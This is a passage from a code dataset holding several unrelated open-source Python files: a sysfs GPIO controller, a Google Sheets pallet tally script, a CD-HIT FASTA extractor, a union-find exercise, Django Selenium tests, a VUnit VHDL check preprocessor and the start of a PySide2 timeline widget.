logging.getLogger('sysfs.gpio')\nLogger.addHandler(logging.StreamHandler())\nLogger.setLevel(logging.DEBUG)\n\n# Sysfs constants\n\nSYSFS_BASE_PATH = '/sys/class/gpio'\n\nSYSFS_EXPORT_PATH = SYSFS_BASE_PATH + '/export'\nSYSFS_UNEXPORT_PATH = SYSFS_BASE_PATH + '/unexport'\n\nSYSFS_GPIO_PATH = SYSFS_BASE_PATH + '/gpio%d'\nSYSFS_GPIO_DIRECTION_PATH = SYSFS_GPIO_PATH + '/direction'\nSYSFS_GPIO_EDGE_PATH = SYSFS_GPIO_PATH + '/edge'\nSYSFS_GPIO_VALUE_PATH = SYSFS_GPIO_PATH + '/value'\nSYSFS_GPIO_ACTIVE_LOW_PATH = SYSFS_GPIO_PATH + '/active_low'\n\nSYSFS_GPIO_VALUE_LOW = '0'\nSYSFS_GPIO_VALUE_HIGH = '1'\n\nEPOLL_TIMEOUT = 1 # second\n\n# Public interface\n\nINPUT = 'in'\nOUTPUT = 'out'\n\nRISING = 'rising'\nFALLING = 'falling'\nBOTH = 'both'\n\nACTIVE_LOW_ON = 1\nACTIVE_LOW_OFF = 0\n\nDIRECTIONS = (INPUT, OUTPUT)\nEDGES = (RISING, FALLING, BOTH)\nACTIVE_LOW_MODES = (ACTIVE_LOW_ON, ACTIVE_LOW_OFF)\n\n\nclass Pin(object):\n \"\"\"\n Represent a pin in SysFS\n \"\"\"\n\n def __init__(self, number, direction, callback=None, edge=None, active_low=0):\n \"\"\"\n @type number: int\n @param number: The pin number\n @type direction: int\n @param direction: Pin direction, enumerated by C{Direction}\n @type callback: callable\n @param callback: Method be called when pin changes state\n @type edge: int\n @param edge: The edge transition that 
triggers callback,\n                     enumerated by C{Edge}\n        @type active_low: int\n        @param active_low: Indicator of whether this pin uses inverted\n                           logic for HIGH-LOW transitions.\n        \"\"\"\n        self._number = number\n        self._direction = direction\n        self._callback = callback\n        self._active_low = active_low\n\n        self._fd = open(self._sysfs_gpio_value_path(), 'r+')\n\n        if callback and not edge:\n            raise Exception('You must supply an edge to trigger callback on')\n\n        with open(self._sysfs_gpio_direction_path(), 'w') as fsdir:\n            fsdir.write(direction)\n\n        if edge:\n            with open(self._sysfs_gpio_edge_path(), 'w') as fsedge:\n                fsedge.write(edge)\n\n        if active_low:\n            if active_low not in ACTIVE_LOW_MODES:\n                raise Exception('You must supply a value for active_low which is either 0 or 1.')\n            with open(self._sysfs_gpio_active_low_path(), 'w') as fsactive_low:\n                fsactive_low.write(str(active_low))\n\n    @property\n    def callback(self):\n        \"\"\"\n        Gets this pin callback\n        \"\"\"\n        return self._callback\n\n    @callback.setter\n    def callback(self, value):\n        \"\"\"\n        Sets this pin callback\n        \"\"\"\n        self._callback = value\n\n    @property\n    def direction(self):\n        \"\"\"\n        Pin direction\n        \"\"\"\n        return self._direction\n\n    @property\n    def number(self):\n        \"\"\"\n        Pin number\n        \"\"\"\n        return self._number\n\n    @property\n    def active_low(self):\n        \"\"\"\n        Active-low setting\n        \"\"\"\n        return self._active_low\n\n    def set(self):\n        \"\"\"\n        Set pin to HIGH logic level\n        \"\"\"\n        self._fd.write(SYSFS_GPIO_VALUE_HIGH)\n        self._fd.seek(0)\n\n    def reset(self):\n        \"\"\"\n        Set pin to LOW logic level\n        \"\"\"\n        self._fd.write(SYSFS_GPIO_VALUE_LOW)\n        self._fd.seek(0)\n\n    def read(self):\n        \"\"\"\n        Read pin value\n\n        @rtype: int\n        @return: I{0} when LOW, I{1} when HIGH\n        \"\"\"\n        val = self._fd.read()\n        self._fd.seek(0)\n        return int(val)\n\n    def fileno(self):\n        \"\"\"\n        Get the file descriptor associated with this pin.\n\n        @rtype: int\n        @return: File descriptor\n        \"\"\"\n        return self._fd.fileno()\n\n    def changed(self, state):\n        if callable(self._callback):\n            self._callback(self.number, state)\n\n    def _sysfs_gpio_value_path(self):\n        \"\"\"\n        Get the file that represent the value of this pin.\n\n        @rtype: str\n        @return: the path to sysfs value file\n        \"\"\"\n        return SYSFS_GPIO_VALUE_PATH % self.number\n\n    def _sysfs_gpio_direction_path(self):\n        \"\"\"\n        Get the file that represent the direction of this pin.\n\n        @rtype: str\n        @return: the path to sysfs direction file\n        \"\"\"\n        return SYSFS_GPIO_DIRECTION_PATH % self.number\n\n    def _sysfs_gpio_edge_path(self):\n        \"\"\"\n        Get the file that represent the edge that will trigger an interrupt.\n\n        @rtype: str\n        @return: the path to sysfs edge file\n        \"\"\"\n        return SYSFS_GPIO_EDGE_PATH % self.number\n\n    def _sysfs_gpio_active_low_path(self):\n        \"\"\"\n        Get the file that represents the active_low setting for this pin.\n\n        @rtype: str\n        @return: the path to sysfs active_low file\n        \"\"\"\n        return SYSFS_GPIO_ACTIVE_LOW_PATH % self.number\n\n\nclass Controller(object):\n    '''\n    A singleton class to provide access to SysFS GPIO pins\n    '''\n\n    def __new__(cls, *args, **kw):\n        if not hasattr(cls, '_instance'):\n            instance = super(Controller, cls).__new__(cls)\n            instance._allocated_pins = {}\n            instance._poll_queue = select.epoll()\n\n            instance._available_pins = []\n            instance._running = True\n\n            # Cleanup before stopping reactor\n            reactor.addSystemEventTrigger('before', 'shutdown', instance.stop)\n\n            # Run the EPoll in a Thread, as it blocks.\n            reactor.callInThread(instance._poll_queue_loop)\n\n            cls._instance = instance\n        
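# Note: __new__ memoizes the instance, so every Controller() call returns\n        # the same object. A hedged usage sketch (pin numbers are hypothetical,\n        # not taken from this repo):\n        #   Controller.available_pins = [17, 27]\n        #   led = Controller.alloc_pin(17, OUTPUT)\n        #   led.set()    # drive the pin HIGH\n        #   led.reset()  # drive the pin LOW\n        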
return cls._instance\n\n def __init__(self):\n pass\n\n def _poll_queue_loop(self):\n\n while self._running:\n try:\n events = self._poll_queue.poll(EPOLL_TIMEOUT)\n except IOError as error:\n if error.errno != errno.EINTR:\n Logger.error(repr(error))\n reactor.stop()\n if len(events) > 0:\n reactor.callFromThread(self._poll_queue_event, events)\n\n @property\n def available_pins(self):\n return self._available_pins\n\n @available_pins.setter\n def available_pins(self, value):\n self._available_pins = value\n\n def stop(self):\n self._running = False\n\n try:\n values = self._allocated_pins.copy().itervalues()\n except AttributeError:\n values = self._allocated_pins.copy().values()\n for pin in values:\n self.dealloc_pin(pin.number)\n\n def alloc_pin(self, number, direction, callback=None, edge=None, active_low=0):\n\n Logger.debug('SysfsGPIO: alloc_pin(%d, %s, %s, %s, %s)'\n % (number, direction, callback, edge, active_low))\n\n self._check_pin_validity(number)\n\n if direction not in DIRECTIONS:\n raise Exception(\"Pin direction %s not in %s\"\n % (direction, DIRECTIONS))\n\n if callback and edge not in EDGES:\n raise Exception(\"Pin edge %s not in %s\" % (edge, EDGES))\n\n if not self._check_pin_already_exported(number):\n with open(SYSFS_EXPORT_PATH, 'w') as export:\n export.write('%d' % number)\n else:\n Logger.debug(\"SysfsGPIO: Pin %d already exported\" % number)\n\n pin = Pin(number, direction, callback, edge, active_low)\n\n if direction is INPUT:\n self._poll_queue_register_pin(pin)\n\n self._allocated_pins[number] = pin\n return pin\n\n def _poll_queue_register_pin(self, pin):\n ''' Pin responds to fileno(), so it's pollable. '''\n self._poll_queue.register(pin, (select.EPOLLPRI | select.EPOLLET))\n\n def _poll_queue_unregister_pin(self, pin):\n self._poll_queue.unregister(pin)\n\n def dealloc_pin(self, number):\n\n Logger.debug('SysfsGPIO: dealloc_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n with open(SYSFS_UNEXPORT_PATH, 'w') as unexport:\n unexport.write('%d' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction is INPUT:\n self._poll_queue_unregister_pin(pin)\n\n del pin, self._allocated_pins[number]\n\n def get_pin(self, number):\n\n Logger.debug('SysfsGPIO: get_pin(%d)' % number)\n\n return self._allocated_pins[number]\n\n def set_pin(self, number):\n\n Logger.debug('SysfsGPIO: set_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].set()\n\n def reset_pin(self, number):\n\n Logger.debug('SysfsGPIO: reset_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].reset()\n\n def get_pin_state(self, number):\n\n Logger.debug('SysfsGPIO: get_pin_state(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction == INPUT:\n self._poll_queue_unregister_pin(pin)\n\n val = pin.read()\n\n if pin.direction == INPUT:\n self._poll_queue_register_pin(pin)\n\n if val <= 0:\n return False\n else:\n return True\n\n ''' Private Methods '''\n\n def _poll_queue_event(self, events):\n \"\"\"\n EPoll event callback\n \"\"\"\n\n for fd, event in events:\n if not (event & (select.EPOLLPRI | select.EPOLLET)):\n continue\n\n try:\n values = self._allocated_pins.itervalues()\n except AttributeError:\n values = 
self._allocated_pins.values()\n            for pin in values:\n                if pin.fileno() == fd:\n                    pin.changed(pin.read())\n\n    def _check_pin_already_exported(self, number):\n        \"\"\"\n        Check if this pin was already exported on sysfs.\n\n        @type number: int\n        @param number: Pin number\n        @rtype: bool\n        @return: C{True} when it's already exported, otherwise C{False}\n        \"\"\"\n        gpio_path = SYSFS_GPIO_PATH % number\n        return os.path.isdir(gpio_path)\n\n    def _check_pin_validity(self, number):\n        \"\"\"\n        Check if pin number exists on this bus\n\n        @type number: int\n        @param number: Pin number\n        @rtype: bool\n        @return: C{True} when valid, otherwise C{False}\n        \"\"\"\n\n        if number not in self._available_pins:\n            raise Exception(\"Pin number out of range\")\n\n        if number in self._allocated_pins:\n            raise Exception(\"Pin already allocated\")\n\n# Create controller instance\nController = Controller()\n\n\nif __name__ == '__main__':\n    print(\"This module isn't intended to be run directly.\")\n","repo_name":"derekstavis/python-sysfs-gpio","sub_path":"sysfs/gpio.py","file_name":"gpio.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"}\n{"seq_id":"22856124381","text":"from __future__ import print_function\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom collections import Counter\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\n# The ID and range of a sample spreadsheet.\nINPUT_SHEET = '1ImcBQOQ86xwyA_SFtI6H9Vq3szkoUWgdtjHv7wuvBL8'\nSAMPLE_RANGE_NAME = 'input!A2:E'\nMAX_PALLETS = 15\n\ndef main():\n    \"\"\"Shows basic usage of the Sheets API.\n    Prints values from a sample spreadsheet.\n    \"\"\"\n    creds = None\n    # The file token.pickle stores the user's access and refresh tokens, and is\n    # created automatically when the authorization flow completes for the first\n    # time.\n    if os.path.exists('token.pickle'):\n        with open('token.pickle', 'rb') as token:\n            creds = pickle.load(token)\n    # If there are no (valid) credentials available, let the user log in.\n    if not creds or not creds.valid:\n        if creds and creds.expired and creds.refresh_token:\n            creds.refresh(Request())\n        else:\n            flow = InstalledAppFlow.from_client_secrets_file(\n                'credentials.json', SCOPES)\n            creds = flow.run_local_server()\n        # Save the credentials for the next run\n        with open('token.pickle', 'wb') as token:\n            pickle.dump(creds, token)\n\n    service = build('sheets', 'v4', credentials=creds)\n\n    # Call the Sheets API\n    sheet = service.spreadsheets()\n    result = sheet.values().get(spreadsheetId=INPUT_SHEET,\n                                range=SAMPLE_RANGE_NAME).execute()\n    values = result.get('values', [])\n\n    if not values:\n        print('No data found.')\n    else:\n        # print('weight, quantity:')\n        # for row in values:\n        #     # Print columns A and E, which correspond to indices 0 and 4.\n        #     print('%s, %s' % (row[0], row[1]))\n        pallet_weights = [Counter() for _ in range(MAX_PALLETS)]\n        pallet_counts = [Counter() for _ in range(MAX_PALLETS)]\n        for row in values:\n            weight = int(row[0])\n            quantity = int(row[1])\n            description = row[2].lower()\n            source = row[3]\n            pallet_num = int(row[4])\n            total_weights_per_pallet = pallet_weights[pallet_num-1]\n            total_counts_per_pallet = pallet_counts[pallet_num-1]\n            if source == \"Berkeley\" or source == \"berkeley\":\n                total_weights_per_pallet[description] += weight\n                
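# each pallet keeps two parallel Counters keyed by the lower-cased\n                # item description: one sums weight, the other sums quantity\n                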
total_counts_per_pallet[description] += quantity\n counter = 0\n for c in zip(pallet_weights, pallet_counts):\n # print('weight %s, count %s', c)\n values = [\n generate_row(c)\n ]\n body = {\n 'values': values\n }\n range_name = 'BerkXfer!B' + str(counter + 5)\n counter += 1\n result = service.spreadsheets().values().update(\n spreadsheetId=INPUT_SHEET, range=range_name,\n valueInputOption='RAW',body=body).execute()\n\nRELEVANT_FIELDS = ['crt', 'lcd', 'uwed', 'unstackable uwed']\ndef generate_row(zipped_weight_and_counts):\n weights = zipped_weight_and_counts[0]\n counts = zipped_weight_and_counts[1]\n row = []\n for field in RELEVANT_FIELDS:\n weight = weights[field]\n count = counts[field]\n if field == 'uwed':\n weight += weights['lcd']\n count += counts['lcd']\n pair = [weight, count] if field in weights else [0, 0]\n row.extend(pair)\n print(row)\n return row\n\nif __name__ == '__main__':\n main()","repo_name":"Jessegao/CTRC-project","sub_path":"basic_sheets.py","file_name":"basic_sheets.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38794099994","text":"import argparse\n\nfrom lib import *\n\n\n# ----------------------------------------------------------------------------------------\ndef main(args):\n\treference_list_path = args.reference_list[0]\n\tsequence_file_path = args.sequence_file[0]\n\tcluster_file_path = args.cluster_file[0]\n\n\tprint(\"\\nGenerating CD-HIT cluster FASTA files...\\n\")\n\n\tprint(\"Sequence list file: \" + reference_list_path)\n\tprint(\"Sequence FASTA file: \" + sequence_file_path)\n\tprint(\"CD-Hit cluster file: \" + cluster_file_path + \"\\n\")\n\n\tcheck_file_extensions(reference_list_path, sequence_file_path, cluster_file_path)\n\n\treference_list = get_reference_list(reference_list_path)\n\tfasta_dict = get_fasta_dict(sequence_file_path)\n\tcluster_list = get_cluster_list(cluster_file_path)\n\n\treference_clusters = []\n\tfor cluster in cluster_list:\n\t\tfor reference_accession in reference_list:\n\t\t\tif reference_accession in cluster.cluster_sequences.keys():\n\t\t\t\treference_clusters.append(cluster)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\n\tfasta_list = []\n\tfor cluster in reference_clusters:\n\t\tprint(\"Cluster \" + str(cluster.cluster_id) + \" was found to have reference sequences.\")\n\t\tcluster_accessions = cluster.cluster_sequences.keys()\n\t\tcluster_fastas = map(lambda x: fasta_dict[x].format(\"fasta\"), cluster_accessions)\n\t\tcluster_tuple = (cluster.cluster_id, \"\".join(cluster_fastas))\n\t\tfasta_list.append(cluster_tuple)\n\n\tprint(\"\")\n\tfor cluster_id, fasta in fasta_list:\n\t\ttry:\n\t\t\toutfile = \"Cluster\" + str(cluster_id) + \".faa\"\n\t\t\tprint(\"Writing \" + outfile)\n\t\t\twith open(outfile, \"w\") as new_file:\n\t\t\t\tnew_file.write(fasta)\n\t\t\t\tnew_file.close()\n\t\texcept IOError as e:\n\t\t\tprint(str(e))\n\t\t\tsys.exit(1) # Aborts program. 
(exit(1) indicates that an error occurred)\n\n\tprint(\"\\nAll reference clusters written!\")\n\n\n# ----------------------------------------------------------------------------------------\nif __name__ == '__main__':\n\tdescriptor = \"\"\"\n\tExtracts CD-Hit clusters which contain reference proteins and stores them in FASTA format.\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser(description=descriptor)\n\n\tparser.add_argument('-i', '--cluster_file', metavar='CLUSTER', nargs=1, help='''\n\tCD-Hit cluster file which provides clustering information.''')\n\n\tparser.add_argument('-s', '--sequence_file', metavar='FASTA', nargs=1, help='''\n\tFASTA file which provides sequences to be extracted.''')\n\n\tparser.add_argument('-r', '--reference_list', metavar='LIST', nargs=1, help='''\n\tFile of sequence identifiers (one per line) whose CD-HIT clusters should be turned into FASTA files.''')\n\n\tcli_args = parser.parse_args()\n\n\t# At minimum we require a reference list, a sequence FASTA file and a cluster file to proceed.\n\tproceed = True\n\n\tif cli_args.reference_list is None:\n\t\tprint(\"Error: Missing sequence list path...\")\n\t\tproceed = False\n\n\tif cli_args.sequence_file is None:\n\t\tprint(\"Error: Missing sequence FASTA file path...\")\n\t\tproceed = False\n\n\tif cli_args.cluster_file is None:\n\t\tprint(\"Error: Missing CD-Hit cluster file path...\")\n\t\tproceed = False\n\n\tif proceed:\n\t\tmain(cli_args)\n\telse:\n\t\tprint(\"\")\n\t\tparser.print_help()\n\t\tprint(\"\")\n","repo_name":"LeeBergstrand/CDHITtoFASTA","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}\n{"seq_id":"1817163447","text":"# python3\n\nimport sys\nclass Database:\n    def __init__(self, row_counts):\n        self.row_counts = row_counts\n        self.max_row_count = max(row_counts)\n        n_tables = len(row_counts)\n        self.ranks = [1] * n_tables\n        self.parents = list(range(n_tables))\n\n    def merge(self, src, dst):\n        src_parent = self.get_parent(src)\n        dst_parent = self.get_parent(dst)\n\n        src_parent_rank = self.ranks[src_parent]\n        dst_parent_rank = self.ranks[dst_parent]\n\n        if src_parent == dst_parent:\n            return\n        # merge two components\n        # use union by rank heuristic\n        # update max_row_count with the new maximum table size\n\n        if dst_parent_rank > src_parent_rank:\n            self.parents[src_parent] = dst_parent\n            self.row_counts[dst_parent] += self.row_counts[src_parent]\n            self.row_counts[src_parent] = 0\n            self.max_row_count = max(self.max_row_count, self.row_counts[dst_parent])\n            # keep in mind when finding the max - compare the stored max and the value computed in the row_counts list\n            # of source/destination index\n        else:\n            self.parents[dst_parent] = src_parent\n            self.row_counts[src_parent] += self.row_counts[dst_parent]\n            self.row_counts[dst_parent] = 0\n            self.max_row_count = max(self.max_row_count, self.row_counts[src_parent])\n            if src_parent_rank == dst_parent_rank:  # equal ranks: the merged root's rank grows by one\n                self.ranks[src_parent] += 1\n        return\n\n    def get_parent(self, table):\n        # find parent and compress path\n        if self.parents[table] != table:\n            ## compress the path by updating the parents in the tree\n            self.parents[table] = self.get_parent(self.parents[table])\n\n        return self.parents[table]\n\n\ndef main():\n    n_tables, n_queries = map(int, sys.stdin.readline().split())\n    counts = list(map(int, sys.stdin.readline().split()))\n    #assert len(counts) == n_tables\n    db = Database(counts)\n    for i in range(n_queries):\n        #if i % 100 == 0:\n        #    print(\"processing for 
- \", i)\n dst, src = map(int, sys.stdin.readline().split())\n db.merge(dst - 1, src - 1)\n print(db.max_row_count)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Algorithmic Toolbox1/Data Structures/week2_Priority_Queue/Merging Tables/merging_tables.py","file_name":"merging_tables.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36938978983","text":"from django.urls import reverse\nfrom selenium.webdriver.common.by import By\n\nfrom test.factories import ArticleFactory\n\nfrom test.selenium_setup import SeleniumWithFirefox\n\n\nclass TestArticlesPage(SeleniumWithFirefox):\n def test_articles_page(self):\n ArticleFactory.create_batch(2)\n\n url = reverse(\"articles\")\n self.selenium.get(self.live_server_url + url)\n articles = self.selenium.find_elements(By.CLASS_NAME, \"card\")\n\n self.assertEqual(len(articles), 2)\n\n\nclass TestArticleDetailsPage(SeleniumWithFirefox):\n def test_article_details_page(self):\n article = ArticleFactory.create(body=\"test body\")\n\n url = reverse(\"article_detail\", args=[article.id])\n self.selenium.get(self.live_server_url + url)\n\n article_body = self.selenium.find_element(\n By.XPATH, \"//*[contains(text(), 'test body')]\"\n )\n self.assertEqual(article_body.tag_name, \"p\")\n","repo_name":"Gvard-Windlass/teahouse","sub_path":"articles/test/test_pages.py","file_name":"test_pages.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26625890287","text":"import re\nfrom vunit.ui.preprocessor import Preprocessor\n\n\nclass CheckPreprocessor(Preprocessor):\n \"\"\"\n Preprocessing of check functions adding helpful message to check_relation calls.\n \"\"\"\n\n def __init__(self, order=2000):\n super().__init__(order)\n self._find_operators = re.compile(r\"\\?/=|\\?<=|\\?>=|\\?<|\\?>|\\?=|/=|<=|>=|<|>|=\", re.MULTILINE)\n self._find_quotes = re.compile(r'\"|' + r\"'\", re.MULTILINE)\n self._find_comments = re.compile(r\"--|/\\*|\\*/\", re.MULTILINE)\n self._actual_formal = re.compile(r\"=>(?P.*)\", re.MULTILINE)\n self._leading_paranthesis = re.compile(r\"[\\s(]*\")\n self._trailing_paranthesis = re.compile(r\"[\\s)]*\")\n\n def run(self, code, file_name): # pylint: disable=unused-argument\n check_relation_pattern = re.compile(r\"[^a-zA-Z0-9_](?Pcheck_relation)\\s*(?P\\()\", re.MULTILINE)\n\n check_relation_calls = list(check_relation_pattern.finditer(code))\n check_relation_calls.reverse()\n\n for match in check_relation_calls:\n (\n relation,\n offset_to_point_before_closing_paranthesis,\n ) = self._extract_relation(code, match)\n if relation:\n context_msg_parameter = f\", context_msg => {relation.make_context_msg()!s}\"\n code = (\n code[: match.end(\"parameters\") + offset_to_point_before_closing_paranthesis]\n + context_msg_parameter\n + code[match.end(\"parameters\") + offset_to_point_before_closing_paranthesis :]\n )\n\n return code\n\n def _extract_relation(self, code, check):\n # pylint: disable=missing-docstring\n def end_of_parameter(token):\n return token.value == \",\" if token.level == 1 else token.level == 0\n\n parameter_tokens = []\n index = 1\n relation = None\n for token in self._classify_tokens(code[check.start(\"parameters\") + 1 :]):\n add_token = True\n if token.type == Token.NORMAL:\n # The first found parameter containing a top-level relation is assumed\n 
# to be the expr parameter. This is a very reasonable assumption since\n # the return types of normal relational operators are boolean, std_ulogic,\n # or bit. The expr parameter is the only input of these types.\n if not relation:\n if end_of_parameter(token):\n relation = self._get_relation_from_parameter(parameter_tokens)\n parameter_tokens = []\n add_token = False\n\n if token.level == 0:\n break\n elif token.is_comment:\n add_token = False\n\n if add_token:\n parameter_tokens.append(token)\n\n index += 1\n\n if not relation:\n raise SyntaxError(\n f\"Failed to find relation in {(code[check.start('call') : check.end('parameters') + index])!s}\"\n )\n\n return relation, index - 1\n\n @staticmethod\n def _classify_tokens(code):\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-branches\n def even_quotes(code):\n n_quotes = 0\n for index in range(0, len(code), 2):\n if code[index] != \"'\":\n break\n n_quotes += 1\n\n return (n_quotes % 2) == 0\n\n code_section = Token.NORMAL\n level = 1\n index = 0\n for char in code:\n token = Token(char)\n if code_section == Token.NORMAL:\n if char == '\"':\n code_section = Token.STRING\n elif char == \"'\":\n # Used to avoid mixing up qualified expressions and\n # character literals, e.g. std_logic'('1').\n if even_quotes(code[index:]):\n code_section = Token.CHARACTER_LITERAL\n elif code[index : index + 2] == \"--\":\n code_section = Token.LINE_COMMENT\n elif code[index : index + 2] == \"/*\":\n code_section = Token.BLOCK_COMMENT\n elif char == \"(\":\n level += 1\n elif char == \")\":\n level -= 1\n\n next_code_section = code_section\n\n elif code_section == Token.STRING:\n if char == '\"':\n next_code_section = Token.NORMAL\n elif code_section == Token.CHARACTER_LITERAL:\n if char == \"'\":\n next_code_section = Token.NORMAL\n elif code_section == Token.LINE_COMMENT:\n if char == \"\\n\":\n next_code_section = Token.NORMAL\n elif code_section == Token.BLOCK_COMMENT:\n if code[index - 1 : index + 1] == \"*/\":\n next_code_section = Token.NORMAL\n\n token.type = code_section\n token.level = level\n index += 1\n\n yield token\n\n code_section = next_code_section\n\n def _get_relation_from_parameter(self, tokens):\n # pylint: disable=missing-docstring\n def find_top_level_match(matches, tokens, top_level=1):\n if matches:\n for match in matches:\n if not tokens[match.start()].is_quote and tokens[match.start()].level == top_level:\n return match\n\n return None\n\n relation = None\n token_string = \"\".join([token.value for token in tokens]).strip()\n actual_formal = find_top_level_match(self._actual_formal.finditer(token_string), tokens)\n if actual_formal:\n expr = actual_formal.group(\"actual\")\n start = actual_formal.start(\"actual\")\n else:\n expr = token_string\n start = 0\n\n # VHDL only allows one relational operator at the top level of an expression.\n # This operator divides the relation between left and right. 
The token.level\n # is normally one for the top level but may be higher if the expression is\n # enclosed with parenthesis.\n top_level = (\n min(\n [\n self._leading_paranthesis.match(expr).group().count(\"(\"),\n self._trailing_paranthesis.match(expr[::-1]).group().count(\")\"),\n ]\n )\n + 1\n )\n top_level_match = find_top_level_match(self._find_operators.finditer(expr), tokens[start:], top_level)\n if top_level_match:\n if top_level == 1:\n left = expr[: top_level_match.start()].strip()\n right = expr[top_level_match.end() :].strip()\n else:\n left = expr[: top_level_match.start()].replace(\"(\", \"\", top_level - 1).strip()\n right = expr[: top_level_match.end() : -1].replace(\")\", \"\", top_level - 1).strip()[::-1]\n\n relation = Relation(left, top_level_match.group(), right)\n\n return relation\n\n\nclass Token(object):\n # pylint: disable=missing-docstring\n NORMAL = 0\n STRING = 1\n CHARACTER_LITERAL = 2\n LINE_COMMENT = 3\n BLOCK_COMMENT = 4\n\n def __init__(self, value):\n self.value = value\n self.type = None\n self.level = None\n\n @property\n def is_comment(self):\n return self.type in [self.LINE_COMMENT, self.BLOCK_COMMENT]\n\n @property\n def is_quote(self):\n return self.type in [self.CHARACTER_LITERAL, self.STRING]\n\n\nclass Relation(object):\n # pylint: disable=missing-docstring\n def __init__(self, left, operand, right):\n self._left = left\n self._operand = operand\n self._right = right\n\n def make_context_msg(self):\n eleft = self._left.replace('\"', '\"\"')\n eright = self._right.replace('\"', '\"\"')\n return (\n f'\"Expected {eleft!s} {self._operand!s} {eright!s}. '\n f'Left is \" & to_string({self._left!s}) & \". '\n f'Right is \" & to_string({self._right!s}) & \".\"'\n )\n","repo_name":"VUnit/vunit","sub_path":"vunit/check_preprocessor.py","file_name":"check_preprocessor.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"52"} +{"seq_id":"73121318566","text":"import logging\r\nlog = logging.getLogger( __name__ )\r\n\r\nfrom PySide2 import QtWidgets, QtGui, QtCore\r\n\r\n# mouse\r\nRMB = QtCore.Qt.RightButton\r\nLMB = QtCore.Qt.LeftButton\r\nMMB = QtCore.Qt.MiddleButton\r\n\r\n# Keyboard\r\nMOD_ALT = QtCore.Qt.AltModifier \r\nMOD_SHIFT = QtCore.Qt.ShiftModifier\r\n\r\nclass LnF( object ):\r\n\r\n CLOSE = QtWidgets.QStyle.SP_DockWidgetCloseButton\r\n\r\n WARN = QtWidgets.QStyle.SP_MessageBoxWarning\r\n CRIT = QtWidgets.QStyle.SP_MessageBoxCritical\r\n\r\n NO = QtWidgets.QStyle.SP_DialogNoButton # red dot\r\n YES = QtWidgets.QStyle.SP_DialogYesButton # green dot\r\n HELP = QtWidgets.QStyle.SP_DialogHelpButton\r\n TICK = QtWidgets.QStyle.SP_DialogApplyButton\r\n CROS = QtWidgets.QStyle.SP_DialogCancelButton\r\n\r\n DOWN = QtWidgets.QStyle.SP_ArrowDown\r\n SAVE = QtWidgets.QStyle.SP_DialogSaveButton\r\n OPEN = QtWidgets.QStyle.SP_DialogOpenButton\r\n\r\n PLAY = QtWidgets.QStyle.SP_MediaPlay\r\n STOP = QtWidgets.QStyle.SP_MediaStop\r\n FFWD = QtWidgets.QStyle.SP_MediaSeekForward\r\n RRWD = QtWidgets.QStyle.SP_MediaSeekBackward\r\n SKFW = QtWidgets.QStyle.SP_MediaSkipForward\r\n SKBW = QtWidgets.QStyle.SP_MediaSkipBackward\r\n\r\n INFO = QtWidgets.QStyle.SP_FileDialogInfoView\r\n DEAT = QtWidgets.QStyle.SP_FileDialogDetailedView\r\n LIST = QtWidgets.QStyle.SP_FileDialogListView\r\n \r\n MAGF = QtWidgets.QStyle.SP_FileDialogContentsView\r\n BIGX = QtWidgets.QStyle.SP_BrowserStop\r\n\r\n FLDR = QtWidgets.QStyle.SP_DialogOpenButton\r\n RELD = 
QtWidgets.QStyle.SP_BrowserReload\r\n\r\n NETD = QtWidgets.QStyle.SP_DriveNetIcon\r\n FLPD = QtWidgets.QStyle.SP_DriveFDIcon\r\n\r\n @staticmethod\r\n def getIcon( icon_enum ):\r\n return QtGui.QIcon( QtWidgets.QApplication.style().standardIcon( icon_enum ) )\r\n\r\n @staticmethod\r\n def asPixMap( icon_enum, sz ):\r\n return LnF.getIcon(icon_enum).pixmap( sz )\r\n\r\n\r\nclass QTimeline( QtWidgets.QWidget ):\r\n # Signals\r\n # emits the new frame number (int) when frame changes\r\n requestFrame = QtCore.Signal( int )\r\n\r\n # anounce a rate change. emiting frame period\r\n rateChanged = QtCore.Signal( float )\r\n\r\n # frame changed, not due to playback\r\n frameSkipped = QtCore.Signal()\r\n\r\n RATE_DATA = {\r\n # Human rate : rate, divisor, frame period\r\n \"23.976fps\" : ( 24, 1.001, 41.708333333333336),\r\n \"24fps\" : ( 24, 1.000, 41.666666666666664),\r\n \"25fps\" : ( 25, 1.000, 40.0),\r\n \"29.97fps\" : ( 30, 1.001, 33.36666666666667 ),\r\n \"30fps\" : ( 30, 1.000, 33.333333333333336),\r\n \"47.952fps\" : ( 48, 1.001, 20.854166666666668),\r\n \"48fps\" : ( 48, 1.000, 20.833333333333332),\r\n \"50fps\" : ( 50, 1.000, 20.0),\r\n \"59.94fps\" : ( 60, 1.001, 16.683333333333334),\r\n \"60fps\" : ( 60, 1.000, 16.666666666666668),\r\n }\r\n DEFAULT_RATE = 